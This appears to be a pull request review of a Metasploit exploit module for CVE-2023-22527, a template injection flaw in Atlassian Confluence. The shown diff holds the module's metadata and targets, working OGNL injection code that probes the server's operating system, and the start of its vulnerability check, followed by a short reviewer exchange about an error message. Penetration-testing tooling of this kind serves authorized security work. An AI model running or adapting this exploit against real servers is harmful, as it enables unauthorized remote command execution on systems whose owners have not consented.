modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22527.rb

```diff
@@ -0,0 +1,151 @@
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Confluence SSTI Injection',
+        'Description' => %q{
+          This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses
+          the injection to evaluate an OGNL expression resulting in OS command execution.
+        },
+        'Author' => [
+          'Rahul Maini', # ProjectDiscovery analysis
+          'Harsh Jaiswal', # ProjectDiscovery analysis
+          'Spencer McIntyre'
+        ],
+        'References' => [
+          ['CVE', '2023-22527'],
+          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],
+          ['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']
+        ],
+        'DisclosureDate' => '2024-01-16', # Atlassian advisory released
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Payload' => { 'Space' => 8191, 'DisableNops' => true }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8090
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def get_confluence_platform
+    # this method gets the platform by exploiting CVE-2023-22527
+    return @confluence_platform if @confluence_platform
+
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      @org.apache.struts2.ServletActionContext@getResponse().setHeader(
+        '#{header}',
+        (@java.lang.System@getProperty('os.name'))
+      )
+    OGNL
+    res = inject_ognl(ognl)
+    return nil unless res
+
+    res.headers[header]
+  end
+
+  def check
+    confluence_version = get_confluence_version
+    return CheckCode::Unknown unless confluence_version
+
+    vprint_status("Detected Confluence version: #{confluence_version}")
+
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      return CheckCode::Safe('Failed to test OGNL injection.')
```

Comment:
```suggestion
      return CheckCode::Safe('OGNL injection failed.')
```

The test was run successfully, but its result is negative.

Reply:
It may or may not have run correctly, the return value does not differentiate between different failures. This is also the same verbiage used in the other Confluence module so I'd like to keep it consistent if I may.